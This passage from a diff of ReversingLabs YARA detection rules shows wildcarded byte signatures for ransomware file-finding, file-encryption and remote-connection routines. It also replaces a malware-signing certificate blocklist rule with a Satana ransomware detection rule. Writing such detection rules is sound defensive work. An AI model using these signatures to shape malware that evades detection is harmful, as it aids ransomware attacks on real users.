65 ?? 5B 5E 5F 5D C2 ?? ?? 8D 76 + ?? 8D BC 27 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 + } + $find_files_p3 = { + 8B 45 ?? F6 85 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 75 + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 89 + C3 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? + ?? EB ?? 89 C3 8B 85 ?? ?? ?? ?? 39 F0 75 ?? EB ?? EB ?? EB ?? 89 C3 EB ?? C7 04 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB + } + $encrypt_files_p1 = { + 55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 00 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83 + F8 ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? + 89 34 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? + 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 34 24 05 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? 89 44 24 ?? 83 D2 ?? A1 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85 + ?? ?? ?? ?? FF D0 31 C0 83 EC ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AB 7C ?? 0F + 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 74 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? + 83 EC ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F + 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 35 ?? ?? ?? ?? 0B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? + 80 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? + ?? ?? 89 D9 89 04 24 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? + ?? ?? 83 EC ?? 8B B5 ?? ?? ?? ?? 89 D9 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 1E 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D + } + $encrypt_files_p2 = { + 85 ?? ?? ?? ?? 89 04 24 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 8B + 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 + ?? 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 04 24 89 54 + 24 ?? 8B 0E 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? + ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 + ?? ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8B 85 + ?? ?? ?? ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? C7 04 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 + 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? + 1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F AC D0 ?? C1 EA ?? 89 D3 09 + C3 0F 84 ?? ?? ?? ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 D2 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 90 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44 + 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 8D ?? + ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C + } + $encrypt_files_p3 = { + 24 ?? 89 0C 24 8B 0A E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B + 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 89 54 24 ?? 89 1C 24 + FF 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 81 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 5C + 24 ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 + EC ?? 81 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 D9 83 95 ?? ?? ?? ?? ?? 8B 02 89 04 24 E8 ?? + ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D + ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 0B 89 85 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0B E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 83 EC ?? 89 04 24 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B + 85 ?? ?? ?? ?? 89 44 24 ?? 8B 0B E8 ?? ?? ?? ?? 8B 0B 83 EC ?? E8 ?? ?? ?? ?? 8B 9D + ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 1C 24 FF 15 ?? ?? ?? ?? 8B + } + $encrypt_files_p4 = { + 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 1C + 24 89 44 24 ?? 89 54 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 83 85 ?? ?? ?? ?? ?? 8B 9D ?? + ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 31 CB 31 D0 89 DA 09 C2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95 + ?? ?? ?? ?? 1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ?? + 89 C3 89 44 24 ?? 89 0C 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 8B 08 E8 ?? ?? + ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 7C 24 ?? 8B BD ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 8B + 95 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 5C 24 ?? 8B 1D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? 89 74 24 ?? 89 54 24 ?? 89 3C 24 89 9D ?? ?? ?? ?? FF D3 8B 95 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 EC ?? B9 ?? ?? ?? ?? C7 85 + } + $encrypt_files_p5 = { + 89 DF C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F AC D0 ?? C1 EA + ?? 01 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 11 95 ?? ?? ?? ?? 31 C0 C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? 89 7C 24 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31 C0 F3 AB 8B BD ?? ?? ?? ?? 89 74 + 24 ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? + 89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 + EC ?? 8B 18 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? + ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? 8D BD ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8B B5 + ?? ?? ?? ?? 31 D2 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F3 AB 8B BD ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? 89 F9 C1 F9 ?? 83 E1 ?? 89 C8 01 F0 11 FA 0F AC D0 ?? C1 FA ?? 83 + } + $encrypt_files_p6 = { + C0 ?? 83 D2 ?? 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 FA 09 F2 + 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 F7 C6 00 ?? 83 C0 ?? 39 C2 75 ?? 89 BD + ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 D9 89 04 + 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 18 A1 ?? ?? ?? ?? 89 44 24 ?? 8D 85 + ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 + 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 83 C0 + ?? 83 EC ?? 8B 56 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 7D ?? 29 C2 8D B5 ?? ?? ?? ?? 8D 9D + ?? ?? ?? ?? 8B 0F C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? 8D 0C 41 8D 04 51 89 0C 24 89 F1 + 89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 34 24 8D 48 ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? + 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 47 ?? 89 34 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0F C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 90 89 34 24 8B + 0F 83 C6 ?? E8 ?? ?? ?? ?? 83 EC ?? 39 DE 75 ?? 8B BD ?? ?? ?? ?? 8B B5 + } + $encrypt_files_p7 = { + 8B 0F E8 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 + 04 24 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? + 8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 0F 89 95 ?? ?? ?? ?? 89 95 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0F E8 ?? ?? ?? ?? 8B 0F 83 EC ?? E8 ?? + ?? ?? ?? 8B 0F 89 F7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? 89 34 24 8D B5 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 + EC ?? 89 3C 24 C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 + ?? FF 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 85 FF 0F 85 ?? ?? + ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D + ?? ?? ?? ?? 0F 97 C0 0F B6 C0 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ?? + ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8D 65 + ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 + } + $encrypt_files_p8 = { + 83 EC ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 + 04 24 ?? ?? ?? ?? 89 C6 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 C1 F8 ?? 89 F1 89 + 44 24 ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 89 B5 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? 89 C3 A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 89 + 04 24 89 54 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? + ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 + 7C 24 ?? 89 44 24 ?? 89 34 24 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 5C 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 83 C3 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 89 44 24 ?? FF + 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 39 C3 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 76 ?? 81 BD ?? ?? + ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 89 C6 C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 34 24 E8 ?? + ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB + } + $remote_connection_p1 = { + 55 57 56 53 81 EC ?? ?? ?? ?? 8B 1A 39 18 0F 84 ?? ?? ?? ?? 89 54 24 ?? 89 C6 8D 5C + 24 ?? F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 DF 8B 56 ?? 89 54 24 + ?? 8B 56 ?? 89 54 24 ?? 8B 56 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 + 3C 24 E8 ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 BA ?? ?? ?? ?? 89 D5 + 29 C5 F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 06 89 44 24 ?? 8B 46 ?? 89 44 24 ?? + C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 8B 7C 24 ?? + 8B 07 89 04 24 E8 ?? ?? ?? ?? FF 47 ?? 8B 46 ?? 01 47 ?? 8B 6E ?? 85 ED 0F 84 ?? ?? + ?? ?? 89 6C 24 ?? 8D 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 85 C0 74 ?? C6 03 ?? A8 ?? 0F 85 ?? + ?? ?? ?? 8B 7D ?? 8B 75 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 7C 24 ?? 89 74 24 ?? 89 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 74 24 ?? 29 F0 89 44 24 ?? 8D 04 33 89 + 04 24 E8 ?? ?? ?? ?? 89 DF 8B 17 83 C7 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? + ?? 74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 88 C1 00 C1 83 DF ?? 29 DF 8B 75 + } + $remote_connection_p2 = { + 89 34 24 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 29 F9 39 C1 0F 8D ?? ?? ?? ?? 8D 04 3B 83 F9 + ?? 0F 83 ?? ?? ?? ?? 85 C9 74 ?? 8A 16 88 10 F6 C1 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? + ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 01 D8 89 04 24 E8 ?? ?? ?? ?? + 89 5C 24 ?? 8B 44 24 ?? 8B 00 89 04 24 E8 ?? ?? ?? ?? 8B 6D ?? 85 ED 74 ?? 8D 44 24 + ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 44 24 ?? 8B 44 24 ?? 83 F8 ?? + 0F 82 ?? ?? ?? ?? C7 44 03 ?? ?? ?? ?? ?? 8D 48 ?? C1 E9 ?? 89 DF B8 ?? ?? ?? ?? F3 + AB E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 90 8D 74 26 ?? + 8D 40 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 10 89 54 24 ?? 8B 50 ?? 89 54 24 ?? 8B 40 ?? 89 + 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 + DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ?? A9 + } + $remote_connection_p3 = { + 75 ?? C1 E8 ?? 83 C2 ?? 88 C1 00 C1 83 DA ?? 29 DA 8D 3C 13 B8 ?? ?? ?? ?? 29 D0 E9 + ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 29 F8 89 44 24 ?? 89 + 74 24 ?? 01 DF 89 3C 24 E8 ?? ?? ?? ?? 89 D8 8B 08 83 C0 ?? 8D 91 ?? ?? ?? ?? F7 D1 + 21 CA 81 E2 ?? ?? ?? ?? 74 ?? F7 C2 ?? ?? ?? ?? 75 ?? C1 EA ?? 83 C0 ?? 88 D1 00 D1 + 83 D8 ?? 29 D8 BA ?? ?? ?? ?? 29 C2 E9 ?? ?? ?? ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ?? + 8B 16 89 10 8B 54 0E ?? 89 54 08 ?? 8D 78 ?? 83 E7 ?? 29 F8 29 C6 01 C1 C1 E9 ?? F3 + A5 E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 89 54 24 ?? 8D 46 ?? 89 + 04 24 E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ?? + ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 8B 54 24 ?? 29 C2 89 D5 E9 ?? ?? + ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 8B 44 24 ?? 66 C7 44 03 ?? ?? ?? E9 + ?? ?? ?? ?? 66 8B 54 0E ?? 66 89 54 08 ?? E9 ?? ?? ?? ?? 90 8B 54 24 ?? 8B 44 24 ?? + E9 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\xB8\\xB8\\xE5\\xB7\\x9E\\xE9\\xAA\\x8F\\xE6\\x99\\xAF\\xE9\\x80\\x9A\\xE8\\x81\\x94\\xE6\\x95\\xB0\\xE5\\xAD\\x97\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="3a:6c:ca:bb:1c:62:f3:be:3e:b0:38:69:fa:43:dc:4a" and 1259798399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_864196F01971Dbec7002B48642A7013A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Satana : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Satana ransomware." author = "ReversingLabs" - id = "80478430-ce01-5fae-bcaf-2b7a445bc20d" - date = "2023-11-08" - modified = "2023-11-08" + id = "8dc5bf7c-d4cb-5961-804b-035676dacbc0" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2412-L2430" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a3173bb08e673caaa64ab22854840a135e891044b165bbc67733c951ec6aa991" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Satana.yara#L1-L123" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5deb6ac2e8b64fb6f7af8c41a9b9e695668ca66c96c65f0c7350b11cd4ae0c50" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Satana" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "WLE DESENVOLVIMENTO DE SOFTWARE E ASSESSORIA LTDA EPP" and (pe.signatures[i].serial=="00:86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" or pe.signatures[i].serial=="86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a") and 